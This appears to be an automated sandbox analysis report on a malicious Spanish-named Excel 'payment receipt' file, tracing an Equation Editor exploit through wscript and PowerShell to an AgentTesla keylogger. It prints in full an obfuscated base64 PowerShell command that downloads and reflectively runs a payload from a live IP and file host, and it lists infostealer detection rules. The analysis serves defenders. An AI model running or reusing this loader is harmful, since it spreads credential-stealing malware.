d4 5c 65 67 7f 67 de ab 33 d7 2e cd 37 33 bd d3 c2 dc 67 6f 3e af cd 15 0f 33 1e bb 5f 0a 33 c6 0f e6 c2 c9 53 ce dd 47 e6 da 8d 79 6a c3 bc 47 e6 ff 81 79 5e 2f e7 77 73 8f 9d f9 2c 34 77 bd 9a b7 1c 21 57 47 33 b2 68 b8 53 68 ee b3 64 9d 46 e6 29 21 f2 bd 34 2b 13 f3 a6 72 a7 d6 7c 63 c1 ce 4b cc 4f d6 ac c6 94 71 75 de 98 c6 c8 66 89 bc 7e 9a 7f df cc 3b 59 49 6e 18 9d dc 29 61 d5 8f e6 a7 6b f3 66 76 e5 73 f3 89 dd 2f 81 f9 bb bf 53 87 e4 db 31 2f 58 a1 d6 fc 2b e6 2e f5 b0 8b ed ef 8c 77 0e cc f7 6b 9e 64 67 68 6f 9e 1d f2 64 37 eb b1 79 e6 c3 dc 63 6f de f0 80 dc d8 71 16 e6 cf e5 20 9d 4b 56 d4 ee 1b 3b 03 f6 f9 76 26 8f 3c d9 49 e7 4e e5 27 30 ff 0a cd 5d 4f dc 25 47 9a e5 4e 91 f9 46 ce 3e 6b 58 a3 89 f9 33 31 7f 5f d8 f5 fd 9d 4e 66 24 85 79 5a 65 d6 e8 86 84 c7 48 b5 bd 6b a2 77 0a cc 1d 8e e6 7b 1d 7a c5 6a 83 82 7b 74 e6 f7 c2 5b 3f 2b ab 76 86 1a f3 d4 0b f7 b9 9b d1 6c cc bf 57 7a a7 fc e5 dd ac 8e d5 2b 17 f3 e4 96 1d d1 99 a7 56 ec 67 a7 3b ed 9d 13 f3 cd d6 7c 9e 99 71 85 8c 7c e5 ed 98 b5 f9 7c 6d e6 ea c3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cumconstraints[1].vbsJump to behavior
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cumconstraints.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.121.86.105Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /emmabigssss.txt HTTP/1.1Host: 87.121.86.105Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: 1016.filemail.com
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: EQNEDT32.EXE, 00000002.00000002.470731109.000000000026F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.86.105/cumconstraints.vbs
                  Source: EQNEDT32.EXE, 00000002.00000002.470930228.0000000003550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.86.105/cumconstraints.vbsj
                  Source: EQNEDT32.EXE, 00000002.00000002.470731109.000000000026F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.86.105/cumconstraints.vbsl?9
                  Source: EQNEDT32.EXE, 00000002.00000002.470731109.000000000026F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.121.86.105/cumconstraints.vbsssC:
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: InstallUtil.exe, 00000008.00000002.628206109.0000000002161000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.628206109.00000000021FC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.628206109.0000000002219000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: powershell.exe, 00000006.00000002.520366968.0000000007226000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.628206109.0000000002161000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.627094210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.628206109.00000000021FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: powershell.exe, 00000006.00000002.516444282.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: powershell.exe, 00000006.00000002.516444282.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.628206109.0000000002161000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.628206109.00000000021FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: powershell.exe, 00000006.00000002.516444282.0000000002609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1016.filemail.com
                  Source: powershell.exe, 00000006.00000002.516444282.0000000002609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T
                  Source: powershell.exe, 00000006.00000002.520366968.0000000007226000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.627094210.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: powershell.exe, 00000006.00000002.516444282.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000006.00000002.516444282.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000006.00000002.516444282.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000006.00000002.516444282.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000006.00000002.519963883.0000000004F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, abAX9N.cs.Net Code: vlSGNr

                  System Summary

                  barindex
                  Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                  Source: 6.2.powershell.exe.72265d0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 6.2.powershell.exe.72265d0.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5zc3NzZ2liYW1tZS81MDEuNjguMTIxLjc4Ly86cHR0aCcsICckcGlwb2NvJywgJyRwaXBvY28nLCAnJHBpcG9jbycsICdJbnN0YWxsVXRpbCcsICckcGlwb2NvJywgJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJzEnLCckcGlwb2NvJykpOw==';$alteastro = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($elar));Invoke-Expression $alteastro
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5zc3NzZ2liYW1tZS81MDEuNjguMTIxLjc4Ly86cHR0aCcsICckcGlwb2NvJywgJyRwaXBvY28nLCAnJHBpcG9jbycsICdJbnN0YWxsVXRpbCcsICckcGlwb2NvJywgJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJzEnLCckcGlwb2NvJykpOw==';$alteastro = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($elar));Invoke-Expression $alteastroJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_002E38F08_2_002E38F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_002E49108_2_002E4910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_002EF3008_2_002EF300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_002EBC008_2_002EBC00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_002E8D4E8_2_002E8D4E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_002E3C388_2_002E3C38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00451D688_2_00451D68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_004516808_2_00451680
                  Source: Comprobante de pago.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                  Source: 6.2.powershell.exe.72265d0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 6.2.powershell.exe.72265d0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, RsYAkkzVoy.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, Kqqzixk.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, xROdzGigX.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, ywes.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, iPVW0zV.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, 1Pi9sgbHwoV.csCryptographic APIs: 'CreateDecryptor'
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, YUgDfWK2g4.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, YUgDfWK2g4.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, MarWtcu.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, MarWtcu.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, MarWtcu.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 6.2.powershell.exe.72265d0.0.raw.unpack, MarWtcu.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@8/8@5/3
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Comprobante de pago.xlam.xlsxJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8EF5.tmpJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P.....................L.......)n.........................s............................0...............Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P.....................L.......-n.........................s............................x...............Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Comprobante de pago.xlam.xlsxReversingLabs: Detection: 68%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5zc3NzZ2liYW1tZS81MDEuNjguMTIxLjc4Ly86cHR0aCcsICckcGlwb2NvJywgJyRwaXBvY28nLCAnJHBpcG9jbycsICdJbnN0YWxsVXRpbCcsICckcGlwb2NvJywgJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJzEnLCckcGlwb2NvJykpOw==';$alteastro = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($elar));Invoke-Expression $alteastro
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mentallanguagefatalmemtallliz.vbs" Jump to behavior
